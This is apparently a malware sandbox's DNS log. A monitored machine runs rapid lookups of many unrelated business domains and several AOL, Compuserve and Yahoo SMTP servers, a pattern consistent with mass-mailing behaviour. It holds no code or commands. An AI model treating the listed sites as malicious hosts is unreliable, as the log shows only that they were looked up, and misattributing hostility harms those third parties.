                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:43.933396101 CEST8.8.8.8192.168.2.30xb945No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.083560944 CEST8.8.8.8192.168.2.30xd1c8No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.115612984 CEST8.8.8.8192.168.2.30x14ccNo error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.172449112 CEST8.8.8.8192.168.2.30xabf9No error (0)rkengg.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.172449112 CEST8.8.8.8192.168.2.30xabf9No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.172449112 CEST8.8.8.8192.168.2.30xabf9No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.172449112 CEST8.8.8.8192.168.2.30xabf9No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.208251953 CEST8.8.8.8192.168.2.30xa63bNo error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.244437933 CEST8.8.8.8192.168.2.30x9ae8No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.349936962 CEST8.8.8.8192.168.2.30x98e0No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.408653975 CEST8.8.8.8192.168.2.30x42cNo error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.415280104 CEST8.8.8.8192.168.2.30x52b7Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.441308022 CEST8.8.8.8192.168.2.30x6b54Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.496407986 CEST8.8.8.8192.168.2.30xc267Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.562088966 CEST8.8.8.8192.168.2.30x2b69Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.739552021 CEST8.8.8.8192.168.2.30x3d9eNo error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:44.878703117 CEST8.8.8.8192.168.2.30x6144No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.143871069 CEST8.8.8.8192.168.2.30xb936No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.143871069 CEST8.8.8.8192.168.2.30xb936No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.312202930 CEST8.8.8.8192.168.2.30x1bf2No error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.312202930 CEST8.8.8.8192.168.2.30x1bf2No error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.312202930 CEST8.8.8.8192.168.2.30x1bf2No error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.312202930 CEST8.8.8.8192.168.2.30x1bf2No error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.312202930 CEST8.8.8.8192.168.2.30x1bf2No error (0)smtp.aol.g03.yahoodns.net87.248.97.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.392143965 CEST8.8.8.8192.168.2.30x9049No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:45.933731079 CEST8.8.8.8192.168.2.30xbd1bNo error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.109474897 CEST8.8.8.8192.168.2.30x15bbNo error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.109474897 CEST8.8.8.8192.168.2.30x15bbNo error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.109474897 CEST8.8.8.8192.168.2.30x15bbNo error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.109474897 CEST8.8.8.8192.168.2.30x15bbNo error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.109474897 CEST8.8.8.8192.168.2.30x15bbNo error (0)smtp.aol.g03.yahoodns.net87.248.97.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.125742912 CEST8.8.8.8192.168.2.30x703aNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.125742912 CEST8.8.8.8192.168.2.30x703aNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.161623955 CEST8.8.8.8192.168.2.30xca56Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.163491011 CEST8.8.8.8192.168.2.30xf90eNo error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.163491011 CEST8.8.8.8192.168.2.30xf90eNo error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.163491011 CEST8.8.8.8192.168.2.30xf90eNo error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.163630962 CEST8.8.8.8192.168.2.30x22eeName error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.180244923 CEST8.8.8.8192.168.2.30x2815Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.181910992 CEST8.8.8.8192.168.2.30x232No error (0)www.alteor.clgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.181910992 CEST8.8.8.8192.168.2.30x232No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.181910992 CEST8.8.8.8192.168.2.30x232No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.327212095 CEST8.8.8.8192.168.2.30xb907No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.328459024 CEST8.8.8.8192.168.2.30xdc48No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.408792973 CEST8.8.8.8192.168.2.30x6f2fNo error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.409337044 CEST8.8.8.8192.168.2.30x2e80No error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.660353899 CEST8.8.8.8192.168.2.30xa8dNo error (0)mjrcpas.com47.91.170.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.717247963 CEST8.8.8.8192.168.2.30x61dNo error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.819365025 CEST8.8.8.8192.168.2.30x9277No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.923535109 CEST8.8.8.8192.168.2.30x70f1No error (0)araax.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.923535109 CEST8.8.8.8192.168.2.30x70f1No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.923535109 CEST8.8.8.8192.168.2.30x70f1No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:46.923535109 CEST8.8.8.8192.168.2.30x70f1No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.102679968 CEST8.8.8.8192.168.2.30x1003No error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.558832884 CEST8.8.8.8192.168.2.30x8ddfNo error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.558832884 CEST8.8.8.8192.168.2.30x8ddfNo error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.558832884 CEST8.8.8.8192.168.2.30x8ddfNo error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.558832884 CEST8.8.8.8192.168.2.30x8ddfNo error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.703507900 CEST8.8.8.8192.168.2.30x6a3cNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.796518087 CEST8.8.8.8192.168.2.30x4a0dNo error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.800699949 CEST8.8.8.8192.168.2.30xbf95No error (0)bount.com.tw188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.800699949 CEST8.8.8.8192.168.2.30xbf95No error (0)bount.com.tw188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.821604967 CEST8.8.8.8192.168.2.30xf600No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.822444916 CEST8.8.8.8192.168.2.30xba3No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.822777987 CEST8.8.8.8192.168.2.30x3a44No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.822873116 CEST8.8.8.8192.168.2.30xd5b9No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.825062990 CEST8.8.8.8192.168.2.30x711Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.864552021 CEST8.8.8.8192.168.2.30xce17No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.903784990 CEST8.8.8.8192.168.2.30x6defNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.915196896 CEST8.8.8.8192.168.2.30xb8aaNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.915196896 CEST8.8.8.8192.168.2.30xb8aaNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.937536001 CEST8.8.8.8192.168.2.30xe952No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.937536001 CEST8.8.8.8192.168.2.30xe952No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.937536001 CEST8.8.8.8192.168.2.30xe952No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.937536001 CEST8.8.8.8192.168.2.30xe952No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:47.938718081 CEST8.8.8.8192.168.2.30x8817Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.204783916 CEST8.8.8.8192.168.2.30xa62eNo error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.315083981 CEST8.8.8.8192.168.2.30x9accNo error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.315083981 CEST8.8.8.8192.168.2.30x9accNo error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.321321011 CEST8.8.8.8192.168.2.30xd6e1Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.327536106 CEST8.8.8.8192.168.2.30xf552No error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.327536106 CEST8.8.8.8192.168.2.30xf552No error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.327536106 CEST8.8.8.8192.168.2.30xf552No error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.344487906 CEST8.8.8.8192.168.2.30xcb03No error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.351025105 CEST8.8.8.8192.168.2.30xdc58No error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.351025105 CEST8.8.8.8192.168.2.30xdc58No error (0)ghs.googlehosted.com216.58.215.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.418713093 CEST8.8.8.8192.168.2.30x420aNo error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.425359011 CEST8.8.8.8192.168.2.30x7a36No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.427665949 CEST8.8.8.8192.168.2.30xd5eaNo error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.427665949 CEST8.8.8.8192.168.2.30xd5eaNo error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.435453892 CEST8.8.8.8192.168.2.30x8b16No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.435453892 CEST8.8.8.8192.168.2.30x8b16No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.435453892 CEST8.8.8.8192.168.2.30x8b16No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.435750961 CEST8.8.8.8192.168.2.30xace0No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.455715895 CEST8.8.8.8192.168.2.30x56c5No error (0)www.petsfan.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.455715895 CEST8.8.8.8192.168.2.30x56c5No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.455715895 CEST8.8.8.8192.168.2.30x56c5No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.455715895 CEST8.8.8.8192.168.2.30x56c5No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.635936975 CEST8.8.8.8192.168.2.30x3c78No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.686816931 CEST8.8.8.8192.168.2.30x956bNo error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.686816931 CEST8.8.8.8192.168.2.30x956bNo error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.686816931 CEST8.8.8.8192.168.2.30x956bNo error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:48.991931915 CEST8.8.8.8192.168.2.30xb907No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.000601053 CEST8.8.8.8192.168.2.30x564fNo error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.035049915 CEST8.8.8.8192.168.2.30xe7faNo error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.113147974 CEST8.8.8.8192.168.2.30xa525Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.144715071 CEST8.8.8.8192.168.2.30x510bServer failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.199762106 CEST8.8.8.8192.168.2.30xc32fNo error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.437401056 CEST8.8.8.8192.168.2.30xdfceNo error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.499383926 CEST8.8.8.8192.168.2.30x9cf6No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.601952076 CEST8.8.8.8192.168.2.30x4cNo error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.664073944 CEST8.8.8.8192.168.2.30xfc22No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.810038090 CEST8.8.8.8192.168.2.30xcb2dNo error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.912379980 CEST8.8.8.8192.168.2.30x1dd6No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:49.912379980 CEST8.8.8.8192.168.2.30x1dd6No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.004888058 CEST8.8.8.8192.168.2.30x59b2No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.004888058 CEST8.8.8.8192.168.2.30x59b2No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.016448021 CEST8.8.8.8192.168.2.30x2088No error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.018903017 CEST8.8.8.8192.168.2.30xb012No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.023946047 CEST8.8.8.8192.168.2.30xe79dNo error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.023946047 CEST8.8.8.8192.168.2.30xe79dNo error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.023946047 CEST8.8.8.8192.168.2.30xe79dNo error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.045311928 CEST8.8.8.8192.168.2.30xd2dfNo error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.045311928 CEST8.8.8.8192.168.2.30xd2dfNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.045311928 CEST8.8.8.8192.168.2.30xd2dfNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.140114069 CEST8.8.8.8192.168.2.30x510bServer failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.240020990 CEST8.8.8.8192.168.2.30x5657Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.450725079 CEST8.8.8.8192.168.2.30x3a3fNo error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.450725079 CEST8.8.8.8192.168.2.30x3a3fNo error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.450725079 CEST8.8.8.8192.168.2.30x3a3fNo error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.450725079 CEST8.8.8.8192.168.2.30x3a3fNo error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.450725079 CEST8.8.8.8192.168.2.30x3a3fNo error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.628173113 CEST8.8.8.8192.168.2.30x86a1No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.636221886 CEST8.8.8.8192.168.2.30xb2ffNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.880994081 CEST8.8.8.8192.168.2.30xccf2No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.880994081 CEST8.8.8.8192.168.2.30xccf2No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.892050028 CEST8.8.8.8192.168.2.30x343aNo error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.892050028 CEST8.8.8.8192.168.2.30x343aNo error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.902307034 CEST8.8.8.8192.168.2.30x8e67No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.902307034 CEST8.8.8.8192.168.2.30x8e67No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.931562901 CEST8.8.8.8192.168.2.30x3d5No error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:50.931562901 CEST8.8.8.8192.168.2.30x3d5No error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.030771971 CEST8.8.8.8192.168.2.30x286dNo error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.094017029 CEST8.8.8.8192.168.2.30xfb28No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.094017029 CEST8.8.8.8192.168.2.30xfb28No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.106499910 CEST8.8.8.8192.168.2.30x286dNo error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.133625031 CEST8.8.8.8192.168.2.30xba10No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.146986008 CEST8.8.8.8192.168.2.30x572bName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.197355986 CEST8.8.8.8192.168.2.30xa2f8Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.207812071 CEST8.8.8.8192.168.2.30x510bServer failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.257616043 CEST8.8.8.8192.168.2.30x67e5No error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.257616043 CEST8.8.8.8192.168.2.30x67e5No error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.257616043 CEST8.8.8.8192.168.2.30x67e5No error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:51.257616043 CEST8.8.8.8192.168.2.30x67e5No error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
